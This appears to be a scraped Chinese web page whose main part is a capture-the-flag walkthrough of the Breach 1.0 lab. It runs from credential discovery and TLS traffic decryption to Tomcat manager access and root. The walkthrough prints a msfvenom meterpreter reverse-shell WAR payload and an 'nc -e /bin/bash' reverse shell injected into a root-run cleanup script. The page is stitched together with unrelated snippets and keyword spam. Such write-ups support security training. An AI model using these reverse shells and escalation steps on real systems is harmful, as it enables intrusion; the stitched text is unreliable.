餐饮网站建设怎样psd网站首页图片

张小明 2026/1/11 4:26:25
餐饮网站建设怎样,psd网站首页图片,建设英文网站要求,重庆的互联网公司这次做一个Vulhub 实战靶场 Breach1.0 参考学习#xff1a; https://www.cnblogs.com/sym945/p/13604758.html 前言 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址#xff08;192.168.110.140#xff09;#xff0c;需要将虚拟机网卡设…这次做一个Vulhub 实战靶场 Breach1.0参考学习 https://www.cnblogs.com/sym945/p/13604758.html前言Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。VM虚机配置有静态IP地址192.168.110.140需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。作者期待大家写出文章特别是通过非预期的方式获取root权限。环境配置启动虚拟机因为靶场虚机配置有静态IP地址192.168.110.140需要将虚拟机网卡设置为host-only仅主机的方式我将kali攻击机添加了一块虚拟网卡第二块网卡设置的网段跟虚拟机同一网段。开始实验下载好靶机并且启动知道了靶场环境的ip地址所以可以直接使用nmap扫描端口查询突破口但是扫描之后发现端口全是打开的显然是做了防端口扫描。根据靶场规律直接访问ip地址发现有http服务。查看网页源代码发现有一串base64加密的字符串。Base64解密连续解密两次echo Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo | base64 -dechocGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh| base64 -d解密结果如下pgibbons:damnitfeel$goodtobeagang$ta初次推断可能是账号和密码而且除了字符串源码里还有个文件地址打开访问发现另外的页面访问页面跳转到如下页面点击Employee portal进入到impresscms的登录界面。想到之前的base64解密结果pgibbons:damnitfeel$goodtobeagang$ta尝试用这个来登录可以登录成功页面如下使用命令searchsploit impresscms找到impresscms的/modules/profile/admin/field.php文件存在SQL注入漏洞想要利用但是发现没有权限访问该文件。那就回到网页看到有3个邮件消息看是否有提示信息。查看前两份邮件没有任何有用的信息直到第三份邮件发现了关键信息。第3封邮件主要内容有一个peter的SSL证书被保存在192.168.110.140/.keystore根据邮件提示到下载包含SSL证书的密钥库keystore文件keystore是存储公私密钥的一种文件格式下载下来保存好。点击home进入index.php再点击content在新界面里面发现了链接。点开提示的http://192.168.110.140/impresscms/modules/content/content.php?content_id1发现一个流量包文件下载下来。而且还有提示信息They told me the alias, storepassword and keypassword are all set to tomcat别名、Keystore密码、key密码都设置成tomcat。由此推测1)这是一个流量包文件不能读取很可能因为某些流量有SSL加密前面的邮件中提供了一个keystore这里提供了密码2)系统中可能存在tomcat。在下载了keystore文件的目录中打开终端输入命令keytool -list -keystore Untitled.keystore输入口令tomcat查看keystore密钥库中的证书。接下来从密钥库导出.p12证书将keystore拷贝到keytool目录导出名为tomcatkeystore.p12的证书输入命令keytool -importkeystore -srckeystore Untitled.keystore -destkeystore tomcatkeystore.p12 -deststoretype PKCS12 -srcalias tomcat将生成的tomcatkeystore.p12证书导入wireshark点击编辑--首选项--Protocols--TLS点击Edit编辑IPaddress填写192.168.110.140,Port填写8443Protocol填写httpKey File选择生成的tomcatkeystore.p12文件Password填写tomcat。分析浏览量数据包发现一个Unauthorized的认证包该request和response包含了Tomcat后台的登录地址https://192.168.110.140:8443/_Mnag3Me/html把信息提取出来tomcat:Tt\5D8F(#!*uG)4m7zB 可能是账号和密码https://192.168.110.140:8443/_Mnag3Me/html直接访问会显示建立安全连接失败这个时候需要打开burp suite但不开启拦截打开代理重新打开网页会出现登录框把之前tomcat:Tt\5D8F(#!*uG)4m7zB输入进去。成功登录到后台。有上传文件的功能可以生产一个木马文件msfvenom -p java/meterpreter/reverse_tcp lhost192.168.110.128 lport1234-f war -o shell.war使用msf 参数设置成自己刚刚设置的把shell.war上传到网站。上传成功后访问https://192.168.110.140:8443/shell/shell.jsp在msf下顺利拿到shell查看当前用户cat /etc/passwd 收集信息看到两个值得关注的账户。在/var/www/5446目录下看到两个文件名很特殊的文件。查看文件发现是mysql的数据库连接文件使用的root账户不需要密码。输入命令mysql -u root -p 进入mysql提示输入密码直接回车成功连接进入mysql数据库查看账号密码得到milton账户的密码哈希解密为:thelaststraw通过密码thelaststraw 来登录milton账户。退出mysql使用命令su milton输入密码成功登录milton账户账户milton目录下发现的some_script.sh脚本没有可利用的地方查看历史命令发现有切换到blumbergh这个账户的操作操作之后有切换到root的操作所以可能提权要进入到blumbergh这个账户。继续收集信息http://192.168.110.140/images/目录下找到6张图片milton用户目录下发现1张图片。使用exiftool工具查看图片输入命令exiftool bill.png 发现密码:coffeestains切换到blumbergh账户输入之前图片中得到的密码切换成功。进入blumbergh目录下查看blumbergh账户的历史命令发现/usr/share/cleanup目录下的tidyup.sh脚本文件。一样进入目录查看脚本为root账户才能读写的用来清理删除webapps目录下的文件的脚本。echo nc -e /bin/bash 192.168.110.122 2345 shell.txt将nc执行的反弹shell命令写入到shell.txt文件cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh使用tee命令将shell.txt内容输出到tidyup.sh打开另一个终端输入nc -lvvp 2345监听2345端口的动静等到一段时间成功接到root的shell。查看/root目录下有个flair.jpg的文件应该是最后的flag将文件再次复制到/var/www/html/images中查看图片成功得到flag。这个图片感觉不算是flag回到一开始的目录下。ls -a 发现有.flag.txt文件直接cat一下拿到flag这个才是真正的flag。结束
版权声明:本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

中国电力建设股份有限公司网站ps网页设计教程及素材

容器编排工具:Mesosphere、Fleet与Cattle使用指南 Mesosphere网络服务与负载均衡 Mesosphere提供了一系列网络服务,使应用编排更加便捷。这些服务为运行中的应用提供服务发现和负载均衡功能。 DNS服务发现 在Mesos DNS中,每个创建的服务都会被分配一个主机名,格式为 s…

张小明 2026/1/10 17:52:54 网站建设

网站百度排名wordpress 修改发布时间

快速体验 打开 InsCode(快马)平台 https://www.inscode.net输入框内输入如下内容: 开发合规风险评估工具,针对CVE-2025-33073漏洞:1. 根据企业所属行业匹配适用法规 2. 计算潜在罚款金额 3. 生成合规差距报告 4. 提供证据留存方案。要求支持…

张小明 2026/1/10 12:29:10 网站建设

网站怎么申请微信认证个人网站发布怎么做

TikTok推广链接生成太耗时?影刀RPA一键批量生成,效率飙升15倍!🚀作为影刀RPA的资深布道者,我深知电商运营在生成推广链接时的"复制粘贴噩梦"。今天,就带你用RPA技术打造推广链接"智能工厂&q…

张小明 2026/1/10 14:47:38 网站建设

网站建设实力创意合肥网站建设

使用 Rx.NET 进行异步编程:从 Flickr 搜索到天气应用 1. 使用 Rx.NET 事件处理搜索 Flickr 照片 我们将构建一个使用 Rx.NET 异步搜索 Flickr 照片的应用程序。通过这个过程,你将学习如何从事件创建可观察数据源以及如何订阅这些数据源。 1.1 创建 Windows Phone 项目 启…

张小明 2026/1/11 1:55:50 网站建设

我想做自己网站怎么做网站做seo安全吗

在 Android 音视频开发中,“后台推流”是一个经典且棘手的需求。常见的场景包括:行车记录仪(熄屏录像)、智能安全帽(后台回传)、执法记录仪等。 传统的做法是将推流逻辑写在 Activity 中,但一旦…

张小明 2026/1/10 15:34:28 网站建设

做网站备案地点购物网站建设个人总结

快手无水印下载神器:KS-Downloader 完整使用教程 【免费下载链接】KS-Downloader 快手无水印视频/图片下载工具 项目地址: https://gitcode.com/gh_mirrors/ks/KS-Downloader 想要轻松保存快手无水印视频和图片?KS-Downloader 作为一款专业的快手…

张小明 2026/1/9 23:56:56 网站建设